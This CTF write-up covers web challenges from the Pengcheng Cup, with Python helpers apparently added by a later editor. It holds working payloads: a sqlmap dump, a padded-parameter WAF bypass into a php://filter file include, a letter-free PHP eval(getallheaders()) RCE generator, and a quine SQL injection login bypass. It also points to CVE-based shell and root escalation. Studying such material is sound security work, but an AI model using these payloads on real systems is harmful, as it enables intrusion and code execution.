Pengcheng Cup (鹏城杯) web challenge writeups

Only remembered to write this up after the competition was over orz

Easygo

Running sqlmap against it directly dumps the flag:
python sqlmap.py -u http://xxx.xxx --dump

简单包含 (Simple Include)

Opening the challenge runs straight into a WAF; from the screenshot it looks like Knownsec's (创宇).
After a series of attempts it was finally bypassed with junk data (presumably the WAF only inspects the leading bytes of the request). The payload looked roughly like this:

a=................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................&a=php://filter/read=convert.base64-encode/resource=flag.php

The padding sits in the first copy of a and the real value in the second: PHP keeps the last value of a repeated parameter name, so what include() receives is the php://filter URL. Then base64-decode the echoed content to get the source of flag.php.
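The mechanics of that bypass, as an added example (not from the original post): it builds the padded, duplicated-parameter body, shows how PHP (last value wins) and a prefix-only WAF (an assumption about the WAF, not something the challenge confirmed) each see it, and decodes the base64 that php://filter/convert.base64-encode returns. The parameter name a, the 600-byte padding, the 512-byte inspection limit and the sample response are all constructed for the example.

```python
"""Padded parameter-pollution LFI payload and decoder for its base64 output."""
import base64
import re
from urllib.parse import parse_qsl, urlencode


def filter_source_payload(resource: str = "flag.php") -> str:
    """php://filter wrapper: the file is returned base64-encoded instead of
    being executed, so PHP source can be read through include()."""
    return f"php://filter/read=convert.base64-encode/resource={resource}"


def build_body(param: str, payload: str, pad_len: int = 600) -> str:
    """Padding copy of the parameter first, real value second (as on the page)."""
    return urlencode([(param, "." * pad_len), (param, payload)])


def php_view(body: str) -> dict:
    """How PHP fills $_GET/$_POST: a repeated name keeps the LAST value."""
    return dict(parse_qsl(body, keep_blank_values=True))


def waf_view(body: str, inspect_limit: int = 512) -> str:
    """Assumed WAF behaviour: only the first inspect_limit bytes are scanned,
    so the filter URL hidden behind the padding is never seen."""
    return body[:inspect_limit]


# A base64 run long enough not to match ordinary HTML words.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_filter_output(response_body: str) -> str:
    """Pull the longest base64 run out of the echoed page and decode it."""
    token = max(B64_TOKEN.findall(response_body), key=len)
    return base64.b64decode(token).decode()


# Constructed response: what the include would echo for resource=flag.php.
SAMPLE_SOURCE = '<?php\n$flag = "flag{constructed-sample}";\n'
SAMPLE_RESPONSE = (
    "<html><body>"
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + "</body></html>"
)

if __name__ == "__main__":
    body = build_body("a", filter_source_payload())
    print("PHP sees :", php_view(body)["a"])
    print("WAF sees :", waf_view(body)[:40], "...")
    print(decode_filter_output(SAMPLE_RESPONSE))
```

The exact amount of padding that defeats a given WAF has to be found by trial, which is what the original payload's long run of dots reflects.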

简单的php400 (Simple PHP, 400)

Opening the challenge: the code parameter is put through a long list of filters. The hint says two-dimensional array, but I spent ages trying to construct a payload and didn't get it.
I guessed at the time that XOR could probably do it as well; regret not learning XOR RCE earlier (you never realise how little you've read until you need it, QAQ).

After the contest I looked at a more experienced player's script:

def one(s):
    # Invert every byte (255 - ord) and %-encode it, then wrap as [~<bytes>][!%FF]( :
    # the inverted ASCII is all >= 0x80, which PHP 7 lexes as an undefined constant
    # whose value is its own name, so ~ flips it back into the function name;
    # [...] makes a one-element array and [!"\xFF"] indexes it with false, i.e. 0.
    ss = ""
    for each in s:
        ss += "%" + str(hex(255 - ord(each)))[2:].upper()
    return f"[~{ss}][!%FF]("

while 1:
    # e.g. eval(end(getallheaders())) -> nested calls. Only zero-argument calls are
    # supported: whatever follows the last "(" is discarded.
    a = input(":>").strip(")")
    aa = a.split("(")
    s = ""
    for each in aa[:-1]:
        s += one(each)
    s += ")" * (len(aa) - 1) + ";"
    print(s)

The payload this script builds bypasses the filter directly. Note that what it actually uses is bitwise NOT (~), not XOR: each function name is sent as its inverted bytes, and [~...][!%FF] is a one-element array indexed by !"\xFF" (false, i.e. 0), which is presumably what the two-dimensional-array hint was pointing at.
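An added example (mine, not the script above or the challenge's code) that builds the same letter-free call chain in two ways: with PHP's ~ as the page's script does, and with ^ for the XOR form mentioned above. It also emulates both PHP string operators so a payload can be decoded offline before it is sent. Assumptions: the target runs PHP 7, where an undefined constant evaluates to its own name and ("...")() calls a string as a function (PHP 8 throws on undefined constants, so the ~ form would need quotes there); the byte pool for the XOR form excludes ASCII letters and digits plus the three characters that would break a double-quoted literal.

```python
"""Letter-free PHP call chains via ~ (bitwise NOT) and ^ (XOR), with emulators."""
from urllib.parse import quote, unquote_to_bytes

# Bytes allowed inside a double-quoted PHP literal for the XOR form: no ASCII
# letter or digit (the filter), and no '"', '\\' or '$' (would end the literal,
# escape, or interpolate). bytes.isalnum() is ASCII-only, so 0x80-0xFF all pass.
POOL = [b for b in range(1, 256)
        if not bytes([b]).isalnum() and b not in b'"\\$']


def php_not(s: bytes) -> bytes:
    """PHP's ~ on a string: every byte inverted."""
    return bytes((~b) & 0xFF for b in s)


def php_xor(a: bytes, b: bytes) -> bytes:
    """PHP's ^ on two equal-length strings: byte-wise XOR."""
    assert len(a) == len(b)
    return bytes(x ^ y for x, y in zip(a, b))


def not_operand(name: str) -> str:
    """~<bytes>, the form on the page: inverted ASCII is all >= 0x80, which PHP 7
    reads as an undefined constant (its value is its own name), and ~ flips it back."""
    return "~" + quote(php_not(name.encode()), safe="")


def xor_operand(name: str) -> str:
    """("..."^"..."): for every byte pick two POOL bytes whose XOR is that byte."""
    left, right = bytearray(), bytearray()
    for t in name.encode():
        a = next((a for a in POOL if (a ^ t) in POOL), None)
        if a is None:
            raise ValueError(f"no letter-free pair for byte {t:#x}")
        left.append(a)
        right.append(a ^ t)
    return '("%s"^"%s")' % (quote(bytes(left), safe=""), quote(bytes(right), safe=""))


def build_call(names, operand=not_operand) -> str:
    """names[0](names[1](...names[-1]()...)), every name written as
    [<operand>][!%FF]( : a one-element array indexed by !"\\xFF", i.e. false/0."""
    return "".join(f"[{operand(n)}][!%FF](" for n in names) + ")" * len(names) + ";"


def recover(payload: str) -> list:
    """Decode a build_call() payload back to plain names using the emulators."""
    names = []
    for chunk in payload.split("][!%FF](")[:-1]:
        expr = chunk[chunk.rindex("[") + 1:]
        if expr.startswith("~"):
            names.append(php_not(unquote_to_bytes(expr[1:])).decode())
        else:
            l, r = expr[2:-2].split('"^"')
            names.append(php_xor(unquote_to_bytes(l), unquote_to_bytes(r)).decode())
    return names


def letter_free(payload: str) -> bool:
    """True when the URL-decoded payload contains no ASCII letter or digit."""
    return not any(bytes([b]).isalnum() for b in unquote_to_bytes(payload))


if __name__ == "__main__":
    for enc in (not_operand, xor_operand):
        p = build_call(["eval", "end", "getallheaders"], enc)
        print(p)
        print(recover(p), letter_free(p))
```

Like the page's script, build_call only nests zero-argument calls; the innermost function is typically something like getallheaders() so the real command can ride in on a request header.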

can_u_login350

Didn't manage this one. Other writeups say it is a quine injection; the payload is:

password='/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")%23',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")%23')%23
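How that quine works, as an added Python emulation (not part of the original post and not the challenge's code): the injected UNION SELECT returns a row whose single column is exactly the string that was injected, so a login that re-compares the fetched password column against the submitted password passes. The template, the build function and the modelled login check are my construction; the page only gives the final payload, and the assumption that the app compares the fetched column with the input is mine. %23 is the URL-encoded # that MySQL sees after decoding.

```python
"""Quine SQL injection: REPLACE(REPLACE(T,0x22,0x27),0x25,T) reproduces its own input."""
import re

# Template: 0x22 (") becomes 0x27 ('), and 0x25 (%) becomes the template itself.
# In MySQL 0x22/0x25/0x27 are hexadecimal *string* literals, i.e. the characters
# themselves (SQLite would read them as integers), so REPLACE works on text.
TEMPLATE = '"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#'

# The payload quoted on the page, # sent as %23 so it survives the URL.
PAGE_PAYLOAD = ("'/**/union/**/select/**/replace(replace('\"/**/union/**/select/**/"
                "replace(replace(\"%\",0x22,0x27),0x25,\"%\")%23',0x22,0x27),0x25,"
                "'\"/**/union/**/select/**/replace(replace(\"%\",0x22,0x27),0x25,\"%\")%23')%23")


def mysql_replace(s: str, old: str, new: str) -> str:
    """MySQL REPLACE(): every non-overlapping occurrence, left to right."""
    return s.replace(old, new)


def build_quine(template: str = TEMPLATE) -> str:
    """The value the injected expression evaluates to, built the same way MySQL does."""
    return mysql_replace(mysql_replace(template, '"', "'"), "%", template)


# The one injected shape we evaluate: a leading ' closes the literal, the UNION
# row is REPLACE(REPLACE(a,'"',"'"),'%',b), and # comments out the trailing quote.
INJECTED = re.compile(
    r"^'/\*\*/union/\*\*/select/\*\*/replace\(replace\('([^']*)',0x22,0x27\),0x25,'([^']*)'\)#$"
)


def evaluate_query(supplied: str, stored: str = "s3cret"):
    """Emulates SELECT password FROM users WHERE password='<supplied>': the first
    SELECT matches nothing for the injected shape, so the UNION row is returned."""
    m = INJECTED.match(supplied)
    if m:
        return mysql_replace(mysql_replace(m.group(1), '"', "'"), "%", m.group(2))
    return stored if supplied == stored else None


def login_ok(supplied: str) -> bool:
    """Assumed flawed check: the fetched column must equal the submitted password."""
    row = evaluate_query(supplied)
    return row is not None and row == supplied


if __name__ == "__main__":
    q = build_quine()
    print(q)
    print("round-trips:", evaluate_query(q) == q, "login:", login_ok(q))
```

Each REPLACE is inside the quoted template, which is why the output contains its own construction: the inner call turns the double quotes into single quotes so the result is valid SQL, and the outer call pastes the template into both placeholders.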

高手高手高手 (Expert, expert, expert)

Didn't know how. It seems to use CVE-2018-17552:
https://cn.0day.today/exploit/31277

After the competition, other players' writeups said you fetch the source from package.zip, get a shell with msf, then escalate with CVE-2021-4034 to read the flag.


Parts of this post are reproduced from
https://mp.weixin.qq.com/s?__biz=Mzg3MTMyMzcxOA==&mid=2247484238&idx=1&sn=89b22714e82886f1c33f3133f0cbbb5d&chksm=ce810267f9f68b717b731474bd3054cea5e68e0b0337a37bd3fef7290e509ca9b7e0eb725b12&mpshare=1&scene=23&srcid=0705RDy5TgSA1W9UWo5mTyrB&sharer_sharetime=1657031773763&sharer_shareid=0a1d87ab761c9e57a428b8937dec2b29
